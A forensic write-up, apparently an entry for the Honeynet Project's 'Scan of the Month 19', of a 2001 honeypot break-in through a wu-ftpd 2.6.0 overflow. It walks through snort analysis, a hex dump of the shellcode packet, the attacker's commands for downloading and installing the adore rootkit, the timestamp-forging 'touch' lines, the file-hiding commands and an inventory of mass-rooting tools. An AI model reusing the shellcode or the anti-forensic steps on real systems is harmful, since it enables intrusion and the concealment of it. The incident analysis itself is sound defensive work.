Preparation: I downloaded the file from the project.honeynet.org web site and verified the integrity of it and then uncompressed it: # wget http://project.honeynet.org/scans/scan19/scan19.tar.gz # md5 scan19.tar.gz 11e0be295d138df14111796a7733a5d2 scan19.tar.gz # gzip -d scan.tar.gz # tar -xvf scan.tar I then created the following directories to store the output from snort: /scan19/scans /scan19/sessions /scan19/syslog /scan19/files I ran snort twice on newdat3.log, once for session output and once for signature matches. For session output I ran snort as follows: #snort -dr newdat3.log -c snort_session.conf -l ./scan19/sessions For signature matches I ran snort as follows: #snort -vdr newdat3.log -c snort_attacks.conf -l ./scan19/scans >>./scans/attacks.txt I ran snort once on slog2.log: #snort -vdr slog2.log -l ./scan19/syslog >>./scan19/syslog/syslogs.txt Analysis: (Note: I have only included the relevant files and directories with the analysis.) ================================================= 1. Which vulnerability did the intruder exploit? ================================================= The attacker used the wu-ftpd2.6.0 exploit to gain root access to the honeypot. This is evident by the following packet from the attacks.txt file: 09/16-19:55:59.485710 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16786 IpLen:20 DgmLen:201 DF ***AP*** Seq: 0xCF78AE1C Ack: 0xEBCE0EB9 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392403 29673724 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 89 1.1.1..F..1.1.C. D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 C9 8D 5E 01 .A.?...k^1.1..^. 88 46 04 66 B9 FF 01 B0 27 CD 80 31 C0 8D 5E 01 .F.f....'..1..^. B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 31 C9 .=..1.1..^..C.1. FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 F3 31 ..1..^.......u.1 C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 30 FE ..F..^..=.....0. C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0C 89 ..F.1..F..v..F.. F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 DB B0 ..N..V.....1.1.. 01 CD 80 E8 90 FF FF FF 30 62 69 6E 30 73 68 31 ........0bin0sh1 2E 2E 31 31 0A ..11. According to Max Vision (http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids287&view=protocol) a packet that matches the wu-ftpd 2.6.0 exploit will have the following string at offset 0: 31c031db 31c9b046 cd80 31c031db This is clearly evident in this packet. This is also the last FTP exploit attempted before the attacker had a remote shell on the honeypot. ================================================================================================= 2. What ways, and in what order, did the intruder use to connect and run commands on the system? ================================================================================================= To get the commands that attacker ran once he/she was logged in I used the session output for the clear text communications. For the SSH communications I correlated the times from the snort packet captures to the syslog packet captures to find out what commands the attacker entered. /217.156.93.66/TCP_61200_23 09/16-19:52:51.989869 ===> The attacker attempted to log into the honeypot as nobody and uucp. /207.35.251.172/TCP_2243_21 09/16-19:55:45.198773 ===> The attacker starts the FTP attack. /217.156.93.66/TCP_2243_21 09/16-19:55:59.485710 ===> The packet that causes the buffer overflow giving he attacker root access is sent. From here the attacker changes the password of the user "nobody" and creates the user "dns" that has root privileges. /217.156.93.66/TCP_61209_23 9/16-20:13:27.206847 ===> The attacker logs into the honeypot as "nobody" and executes the "w" command and then logs out. /217.156.93.66/TCP_61216_23 9/16-20:32:10.206561 ===> The attacker logs into the honeypot as "nobody", su's to "dns". The attacker runs the following commands: w cd /tmp mc -s cd /dev/rd ftp teleport.go.ro mkdir sdc0 cd sdc0 ls Once the attacker logged into the FTP server he/she downloads the following files: Zer0.tar.gz copy.tar.gz ooty.tar.gz The attacker then uncompressed the "Zer0.tar.gz" file and runs the command "Go 24". The "Go" script takes the input, in this case 24 and runs the sshd on that port. The "Go" script also installs the root kits and cleans up the compromised server. tar zxvf Zer0.tar.gz cd Zer0/ ls ./Go 24 /217.156.93.66/TCP_61223_24 09/16-20:51:58.559708 ===> The attacker logs into the honeypot via SSH. The attacker executes the following commands (in order): w whoami cd /dev/rd/sdc0 ls rm Zer0.tar.gz ls alias ls='ls --color' ls ls passwd nobody ping www.yahoo.com pico /etc/rc.d/rc3.d/S50inet ls mv copy.tar.gz /usr/X11R6/bin/.,/copy/ cd /usr/X11R6/bin/.,/copy/ mv copy.tar.gz ../. ls cd .. tar zxvf copy.tar.gz chmod 7777 * ls rm copy.tar.gz cd copy chmod 7777 * ls /217.156.93.66/TCP_61226_24 09/16-20:59:47.852723 ===> The attacker logs into the honeypot via SSH. The attacker appears to have just logged in and logged out. /217.156.93.66/TCP_61227_23 09/16-20:59:57.150510 ===> The attacker telnets into the honeypot as uucp and then logs out. /217.156.93.66/TCP_61230_24 09/16-21:07:16.753385 ===> The attacker logs into the honeypot via SSH. The attacker executed the following commands (in order): uname -r pstree ================================================================== 3. How did the intruder try to hide his edits from the MAC times? ================================================================== The "Go" script first creates three directories: mkdir -p /tmp/.dir1/ mkdir -p /tmp/.dir2/ mkdir -p /tmp/.dir3/ Then it changes the access time and modification time on the directories: touch -acmr /bin /tmp/.dir1 touch -acmr /usr/X11R6/bin /tmp/.dir2 touch -acmr /etc/rc.d/rc3.d /tmp/.dir3 At the end of the "Go" script it changes the access times and modification times for the "/bin", "/usr/X11R6/bin" and "/etc/rc.d/rc3/" directories to that of the "/tmp/.dir1/", "/tmp/,dir2/" and "/tmp/.dir3" directories respectively. touch -acmr /tmp/.dir1 /bin touch -acmr /tmp/.dir2 /usr/X11R6/bin touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d The "Go" script also changes the access time and modification time of the "/etc" directory to that of the "/root" directory. touch -acmr /root /etc ========================================================================================= 4. The intruder downloaded rootkits, what were the called? Are they new/custom rootkits? ========================================================================================= The attacker downloaded the following files: Zer0.tar.gz copy.tar.gz ooty.tar.gz Below is the contents of the above files and a description of the files: Zer0.tar.gz /Zer0/adore.h #Part of the adore root kit. /Zer0/adr.tgz #Contents of a CVS tree for adore. /Zer0/adr2.tgz #Contains four files listed below. ===> adore.o #Part of adore root kit ===> ava #Part of adore root kit. This file is a compiled version of ava.c ===> cleaner.o #Part of adore root kit ===> stad #Shell script that loads the adore.o and cleaner.o LKM's and then removes the cleaner.o LKM. /Zer0/Go #Shell script that installs the root kit and attempts to clean up it's tracks. /Zer0/ssh.tgz #Contains seven files. These files are for the attacker to have an SSH session #with the compromised host on whatever port the attacker wants. /Zer0/tls.tgz #Contains the six files below. ===> nscd.init #Shell script that loads some Trojan LKM's, hides files and loaded the SSH daemon. ===> lgstip #Perl script. ===> vrssb #Shell script that cleans logs ===> patch #Shell script that patches the system. ===> vrssnk #??? ===> vrssnf #??? copy.tar.gz /copy/generate #Binary file.??? /copy/genmass #Binary file.??? /copy/mj2 #Binary file.??? /copy/mj3 #Binary file.??? /copy/process_list #Executable that takes in the wu-scan.log file as input and creates the file ips.wu /copy/root_them #Bash shell script that runs the process_list command and then runs the xploit utility #against all of the IP's that are parsed from the ips.wu file. /copy/ssh #SSH client??? /copy/suu.tgz #??? /copy/wu-scan #Compiled version of wu-scan.c from Narrow. This will generate the wu-scan.log file that #the process_list utility takes as input. /copy/zxploit #Compiled version of 7350wu.c from Team Teso. This is a mass rooting utility. /copy/smrf/smrf5 #Compiled version of smurf.c v5.0 from TFreak. /copy/smrf/smurf.ips #List of IP addresses that are smurfable. ooty.tar.gz /ooty/none~!bighole #??? /ooty/flare #A suid Perl script. /ooty/bighole.c #C source. /ooty/Cr0n #ASCII text file.??? /ooty/bindpar.x #Shell script. /ooty/prlnz.sh #Shell script. This attempts to exploit procmail and sendmail locally. /ooty/mail.x #Shell script. This attempts to exploit sendmail locally. /ooty/perl.x #Shell script. This attempts to exploit suidperl locally. /ooty/motd #ASCII file that is filled with "You were hacked, you should really learn more about security" /ooty/sush #Binary file.??? /ooty/bighole #Binary file.??? /ooty/crontab.x #Binary file.??? /ooty/kernel.x #Binary file.??? Some of the files were part of existing rootkits and other exploit utilities. I was unable to identify some of the files so I was not able to determine if they were custom codeor utilities that all ready existed. ================================================================================ 5. Recover (tell how you did it too) the rootkits from the snort binary capture. ================================================================================ 1. I opened up the snort binary file in EtherPeek and filter it for only FTP. 2. I filtered the FTP sessions by TCP conversations and saved them off in three different files. (Zer0.dmp == Zer0.tar.gz, copy.dmp == copy.tar.gz, ooty.dmp == ooty.tar.gz) 3. I opened each of the saved FTP sessions individually with Ethereal and right clicked on the first packet and chose "Follow TCP Stream". This opened up another window with binary data in it. 4. I then chose "Save as" and saved them with the appropriate file names. ================================================================================ 6. What does the rootkit do to hide the presence of the attacker on the system? ================================================================================ In lines 183-188 of the "Go" script some files are hidden. ./ava h /usr/X11R6/bin/., ./ava h /usr/info/.t0rn ./ava h /dev/rd/sdc0 ./ava h /dev/rd/nscd.init ./ava h /etc/rc.d/rc3.d/S50inet ./ava h /usr/X11R6/lib/X11/.~ Also the fact that a sniffer is running in promiscuous mode is not apparent to the administrator of the compromised system because of the adore root kit. Part of the "Go" script modifies the MAC times of directories and removes certain entries from log files. ========================================== 7. What did you learn from this exercise? ========================================== Most attackers only use tools or utilities that others create. Sometimes attackers don't really don't know what they are doing when they run these scripts. They rely on the knowledge of other hackers to properly write utilities. I am not sure why the attacker was using two seperate systems for the attack. The attacker used one system (207.35.251.172) to actually do the exploit and one system (217.156.93.166)to log into the honeypot before the exploit was run to see if the honeypot had all ready been compromised and to log into the honeypot after the exploit was ran to run more commands. ========================================= 8. How long did this challange take you? ========================================= This scan of the month took me about 10 hours. The time was split about equally between the information gathering and the actual write-up. =============================================================================== Bonus Question: Based on this challange, write an example letter of notification to the source that attacked the system. Include and evidence logs that you feel importent. =============================================================================== To Philippe Daoust, On September 16, 2001 at approximately 19:55 an IP address (207.35.251.172) that is under your control attacked and gained "root" level access to one of our FTP servers. Below are some IDS logs to show the attack. If you need any more information or furthur assistance please let me know. Thank you for your cooperation. Neil [**] [1:346:1] FTP EXPLOIT wu-ftpd 2.6.0 site exec overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 10] 09/16-19:55:57.885306 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16774 IpLen:20 DgmLen:563 DF ***AP*** Seq: 0xCF78A695 Ack: 0xEBCDFDB2 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392242 29673673 [Xref => http://www.whitehats.com/info/IDS286] [**] [1:346:1] FTP EXPLOIT wu-ftpd 2.6.0 site exec overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 10] 09/16-19:55:58.054295 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16777 IpLen:20 DgmLen:489 DF ***AP*** Seq: 0xCF78A894 Ack: 0xEBCE0281 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392259 29673688 [Xref => http://www.whitehats.com/info/IDS286] [**] [1:361:2] FTP site exec [**] [Classification: Potentially Bad Traffic] [Priority: 2] 09/16-19:55:58.209849 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16780 IpLen:20 DgmLen:520 DF ***AP*** Seq: 0xCF78AA49 Ack: 0xEBCE067C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392274 29673702 [Xref => http://www.securityfocus.com/bid/2241] [Xref => http://www.whitehats.com/info/IDS317] [**] [1:361:2] FTP site exec [**] [Classification: Potentially Bad Traffic] [Priority: 2] 09/16-19:55:58.372588 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16783 IpLen:20 DgmLen:563 DF ***AP*** Seq: 0xCF78AC1D Ack: 0xEBCE0AD8 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392290 29673715 [Xref => http://www.securityfocus.com/bid/2241] [Xref => http://www.whitehats.com/info/IDS317] [**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 10] 09/16-19:55:59.485710 207.35.251.172:2243 -> 192.168.1.102:21 TCP TTL:48 TOS:0x0 ID:16786 IpLen:20 DgmLen:201 DF ***AP*** Seq: 0xCF78AE1C Ack: 0xEBCE0EB9 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237392403 29673724 [Xref => http://www.whitehats.com/info/IDS287]